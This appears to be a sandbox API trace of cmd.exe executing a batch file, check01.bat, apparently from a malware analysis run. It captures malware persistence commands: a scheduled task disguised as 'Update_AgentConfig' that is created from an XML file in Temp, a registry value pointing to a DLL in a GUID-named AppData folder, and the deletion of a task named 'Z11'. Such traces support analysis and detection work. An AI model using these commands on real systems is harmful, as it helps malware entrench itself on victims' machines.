[0378.795] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0378.795] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x4a7, lpOverlapped=0x0) returned 1
[0378.795] SetFilePointer (in: hFile=0x64, lDistanceToMove=2777, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0378.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="schtasks /Create /TN \\Update_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n", cbMultiByte=78, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="schtasks /Create /TN \\Update_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 78
[0378.795] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.795] GetFileType (hFile=0x64) returned 0x1
[0378.796] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.796] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0378.796] GetProcessHeap () returned 0x200000
[0378.796] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2393d0
[0378.796] GetProcessHeap () returned 0x200000
[0378.796] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23d3f0
[0378.796] GetProcessHeap () returned 0x200000
[0378.796] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x22) returned 0x21b0c0
[0378.796] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x9
[0378.796] GetProcessHeap () returned 0x200000
[0378.797] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.797] GetProcessHeap () returned 0x200000
[0378.797] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3f0 | out: hHeap=0x200000) returned 1
[0378.797] GetProcessHeap () returned 0x200000
[0378.797] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23d3f0
[0378.797] GetProcessHeap () returned 0x200000
[0378.798] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.798] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.798] GetProcessHeap () returned 0x200000
[0378.798] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.798] GetProcessHeap () returned 0x200000
[0378.798] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3f0 | out: hHeap=0x200000) returned 1
[0378.798] GetProcessHeap () returned 0x200000
[0378.799] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2393d0 | out: hHeap=0x200000) returned 1
[0378.799] _tell (_FileHandle=3) returned 2777
[0378.799] _close (_FileHandle=3) returned 0
[0378.799] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15
[0378.799] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14
[0378.799] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15
[0378.799] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1
[0378.800] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16
[0378.800] _wcsicmp (_String1="schtasks", _String2="CD") returned 16
[0378.800] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16
[0378.800] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1
[0378.800] _wcsicmp (_String1="schtasks", _String2="REN") returned 1
[0378.800] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14
[0378.800] _wcsicmp (_String1="schtasks", _String2="SET") returned -2
[0378.800] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3
[0378.800] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15
[0378.800] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1
[0378.800] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3
[0378.800] _wcsicmp (_String1="schtasks", _String2="MD") returned 6
[0378.800] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6
[0378.800] _wcsicmp (_String1="schtasks", _String2="RD") returned 1
[0378.800] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1
[0378.800] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3
[0378.800] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12
[0378.801] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5
[0378.801] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16
[0378.801] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16
[0378.801] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3
[0378.801] _wcsicmp (_String1="schtasks", _String2="VER") returned -3
[0378.801] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3
[0378.801] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14
[0378.801] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2
[0378.801] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14
[0378.801] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1
[0378.801] _wcsicmp (_String1="schtasks", _String2="START") returned -17
[0378.801] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15
[0378.801] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8
[0378.801] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6
[0378.801] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3
[0378.802] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3
[0378.802] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18
[0378.802] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13
[0378.802] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17
[0378.802] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16
[0378.802] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6
[0378.802] SetErrorMode (uMode=0x0) returned 0x0
[0378.802] SetErrorMode (uMode=0x1) returned 0x0
[0378.802] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x218f20, lpFilePart=0x1ef340 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef340*="system32") returned 0x13
[0378.802] SetErrorMode (uMode=0x0) returned 0x1
[0378.803] GetProcessHeap () returned 0x200000
[0378.803] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f10, Size=0x4a) returned 0x218f10
[0378.803] GetProcessHeap () returned 0x200000
[0378.803] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f10) returned 0x4a
[0378.803] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0378.803] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0378.803] GetProcessHeap () returned 0x200000
[0378.803] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x22b400
[0378.803] GetProcessHeap () returned 0x200000
[0378.803] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x218f70
[0378.803] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f70, Size=0x1d0) returned 0x218f70
[0378.803] GetProcessHeap () returned 0x200000
[0378.804] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f70) returned 0x1d0
[0378.804] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0378.804] GetProcessHeap () returned 0x200000
[0378.804] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21cbf0
[0378.804] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cbf0, Size=0x7e) returned 0x21cbf0
[0378.804] GetProcessHeap () returned 0x200000
[0378.804] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cbf0) returned 0x7e
[0378.804] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0378.804] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*" (normalized: "c:\\windows\\system32\\schtasks.*"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0x21f4a0
[0378.805] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0378.805] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM" (normalized: "c:\\windows\\system32\\schtasks.com"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0xffffffffffffffff
[0378.805] GetLastError () returned 0x2
[0378.805] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE" (normalized: "c:\\windows\\system32\\schtasks.exe"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0x21f4a0
[0378.806] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0378.806] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0378.806] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0378.806] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.806] SetErrorMode (uMode=0x0) returned 0x0
[0378.806] SetErrorMode (uMode=0x1) returned 0x0
[0378.807] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x219160, lpFilePart=0x1eeb90 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1eeb90*="system32") returned 0x13
[0378.807] SetErrorMode (uMode=0x0) returned 0x1
[0378.807] GetProcessHeap () returned 0x200000
[0378.807] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x219150, Size=0x4a) returned 0x219150
[0378.807] GetProcessHeap () returned 0x200000
[0378.807] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x219150) returned 0x4a
[0378.807] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0378.807] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0378.807] GetProcessHeap () returned 0x200000
[0378.807] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x22b5e0
[0378.807] GetProcessHeap () returned 0x200000
[0378.807] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x2191b0
[0378.808] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x2191b0, Size=0x1d0) returned 0x2191b0
[0378.808] GetProcessHeap () returned 0x200000
[0378.808] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x2191b0) returned 0x1d0
[0378.808] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0378.808] GetProcessHeap () returned 0x200000
[0378.808] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21d8c0
[0378.808] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21d8c0, Size=0x7e) returned 0x21d8c0
[0378.808] GetProcessHeap () returned 0x200000
[0378.808] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21d8c0) returned 0x7e
[0378.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0378.808] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*" (normalized: "c:\\windows\\system32\\schtasks.*"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0x21f4a0
[0378.809] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0378.809] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM" (normalized: "c:\\windows\\system32\\schtasks.com"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0xffffffffffffffff
[0378.809] GetLastError () returned 0x2
[0378.809] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE" (normalized: "c:\\windows\\system32\\schtasks.exe"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0x21f4a0
[0378.809] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0378.810] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0378.810] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0378.810] GetConsoleTitleW (in: lpConsoleTitle=0x1eee50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.810] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eec08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eebc8 | out: lpAttributeList=0x1eec08, lpSize=0x1eebc8) returned 1
[0378.810] UpdateProcThreadAttribute (in: lpAttributeList=0x1eec08, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eebb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eec08, lpPreviousValue=0x0) returned 1
[0378.810] GetStartupInfoW (in: lpStartupInfo=0x1eed20 | out: lpStartupInfo=0x1eed20*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0378.810] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1
[0378.811] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Create /TN \\Update_AgentConfig_kEecfMwgj /f /XML \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1eec40*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="schtasks /Create /TN \\Update_AgentConfig_kEecfMwgj /f /XML \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eebf0 | out: lpCommandLine="schtasks /Create /TN \\Update_AgentConfig_kEecfMwgj /f /XML \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml\"", lpProcessInformation=0x1eebf0*(hProcess=0x6c, hThread=0x64, dwProcessId=0xca8, dwThreadId=0xce8)) returned 1
[0378.824] CloseHandle (hObject=0x64) returned 1
[0378.824] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0378.824] GetProcessHeap () returned 0x200000
[0378.825] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd10 | out: hHeap=0x200000) returned 1
[0378.825] GetEnvironmentStringsW () returned 0x22a820*
[0378.825] GetProcessHeap () returned 0x200000
[0378.825] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cc80
[0378.825] memcpy (in: _Dst=0x21cc80, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cc80) returned 0x21cc80
[0378.825] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0378.825] WaitForSingleObject (hHandle=0x6c, dwMilliseconds=0xffffffff) returned 0x0
[0379.688] GetExitCodeProcess (in: hProcess=0x6c, lpExitCode=0x1eeb38 | out: lpExitCode=0x1eeb38*=0x0) returned 1
[0379.688] CloseHandle (hObject=0x6c) returned 1
[0379.688] _vsnwprintf (in: _Buffer=0x1eeda8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eeb48 | out: _Buffer="00000000") returned 8
[0379.688] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0379.688] GetProcessHeap () returned 0x200000
[0379.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc80 | out: hHeap=0x200000) returned 1
[0379.689] GetEnvironmentStringsW () returned 0x22a820*
[0379.689] GetProcessHeap () returned 0x200000
[0379.689] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cc80
[0379.689] memcpy (in: _Dst=0x21cc80, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cc80) returned 0x21cc80
[0379.689] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0379.689] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0379.689] GetProcessHeap () returned 0x200000
[0379.690] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc80 | out: hHeap=0x200000) returned 1
[0379.690] GetEnvironmentStringsW () returned 0x22a820*
[0379.690] GetProcessHeap () returned 0x200000
[0379.690] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cc80
[0379.690] memcpy (in: _Dst=0x21cc80, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cc80) returned 0x21cc80
[0379.690] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0379.690] GetProcessHeap () returned 0x200000
[0379.690] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0379.690] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eec08 | out: lpAttributeList=0x1eec08)
[0379.690] _get_osfhandle (_FileHandle=1) returned 0x7
[0379.690] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0379.691] _get_osfhandle (_FileHandle=1) returned 0x7
[0379.691] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0379.692] _get_osfhandle (_FileHandle=0) returned 0x3
[0379.692] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0379.692] SetConsoleInputExeNameW () returned 0x1
[0379.692] GetConsoleOutputCP () returned 0x1b5
[0379.693] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0379.693] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0379.693] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c
[0379.693] _open_osfhandle (_OSFileHandle=0x6c, _Flags=8) returned 3
[0379.693] _get_osfhandle (_FileHandle=3) returned 0x6c
[0379.693] SetFilePointer (in: hFile=0x6c, lDistanceToMove=2777, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0379.694] GetProcessHeap () returned 0x200000
[0379.694] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d8c0 | out: hHeap=0x200000) returned 1
[0379.694] GetProcessHeap () returned 0x200000
[0379.694] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2191b0 | out: hHeap=0x200000) returned 1
[0379.694] GetProcessHeap () returned 0x200000
[0379.694] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22b5e0 | out: hHeap=0x200000) returned 1
[0379.694] GetProcessHeap () returned 0x200000
[0379.695] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219150 | out: hHeap=0x200000) returned 1
[0379.695] GetProcessHeap () returned 0x200000
[0379.695] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0379.695] GetProcessHeap () returned 0x200000
[0379.695] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0379.695] GetProcessHeap () returned 0x200000
[0379.695] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0379.695] GetProcessHeap () returned 0x200000
[0379.696] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f70 | out: hHeap=0x200000) returned 1
[0379.696] GetProcessHeap () returned 0x200000
[0379.696] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22b400 | out: hHeap=0x200000) returned 1
[0379.696] GetProcessHeap () returned 0x200000
[0379.696] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0379.696] GetProcessHeap () returned 0x200000
[0379.696] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0379.696] GetProcessHeap () returned 0x200000
[0379.696] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0379.696] GetProcessHeap () returned 0x200000
[0379.696] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0379.697] _get_osfhandle (_FileHandle=3) returned 0x6c
[0379.697] SetFilePointer (in: hFile=0x6c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0379.697] ReadFile (in: hFile=0x6c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x459, lpOverlapped=0x0) returned 1
[0379.699] SetFilePointer (in: hFile=0x6c, lDistanceToMove=2807, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0379.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="schtasks /Delete /TN \\Z11 /f\r\n", cbMultiByte=30, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="schtasks /Delete /TN \\Z11 /f\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 30
[0379.699] _get_osfhandle (_FileHandle=3) returned 0x6c
[0379.699] GetFileType (hFile=0x6c) returned 0x1
[0379.699] _get_osfhandle (_FileHandle=3) returned 0x6c
[0379.700] SetFilePointer (in: hFile=0x6c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0379.700] GetProcessHeap () returned 0x200000
[0379.700] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x23d3d0
[0379.700] GetProcessHeap () returned 0x200000
[0379.700] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3d0 | out: hHeap=0x200000) returned 1
[0379.700] _tell (_FileHandle=3) returned 2807
[0379.701] _close (_FileHandle=3) returned 0
[0379.701] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15
[0379.701] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14
[0379.701] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15
[0379.701] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1
[0379.701] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16
[0379.701] _wcsicmp (_String1="schtasks", _String2="CD") returned 16
[0379.701] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16
[0379.701] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1
[0379.701] _wcsicmp (_String1="schtasks", _String2="REN") returned 1
[0379.701] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14
[0379.702] _wcsicmp (_String1="schtasks", _String2="SET") returned -2
[0379.702] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3
[0379.702] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15
[0379.702] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1
[0379.702] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3
[0379.702] _wcsicmp (_String1="schtasks", _String2="MD") returned 6
[0379.702] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6
[0379.702] _wcsicmp (_String1="schtasks", _String2="RD") returned 1
[0379.702] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1
[0379.702] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3
[0379.702] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12
[0379.702] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5
[0379.702] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16
[0379.703] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16
[0379.703] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3
[0379.703] _wcsicmp (_String1="schtasks", _String2="VER") returned -3
[0379.703] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3
[0379.703] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14
[0379.703] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2
[0379.703] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14
[0379.703] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1
[0379.703] _wcsicmp (_String1="schtasks", _String2="START") returned -17
[0379.703] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15
[0379.703] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8
[0379.703] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6
[0379.703] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3
[0379.703] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3
[0379.704] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18
[0379.704] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13
[0379.704] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17
[0379.704] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16
[0379.704] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6
[0379.704] SetErrorMode (uMode=0x0) returned 0x0
[0379.704] SetErrorMode (uMode=0x1) returned 0x0
[0379.704] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x218f20, lpFilePart=0x1ef340 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef340*="system32") returned 0x13
[0379.704] SetErrorMode (uMode=0x0) returned 0x1
[0379.705] GetProcessHeap () returned 0x200000
[0379.705] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f10, Size=0x4a) returned 0x218f10
[0379.705] GetProcessHeap () returned 0x200000
[0379.705] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f10) returned 0x4a
[0379.705] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0379.705] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0379.705] GetProcessHeap () returned 0x200000
[0379.705] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x22b400
[0379.705] GetProcessHeap () returned 0x200000
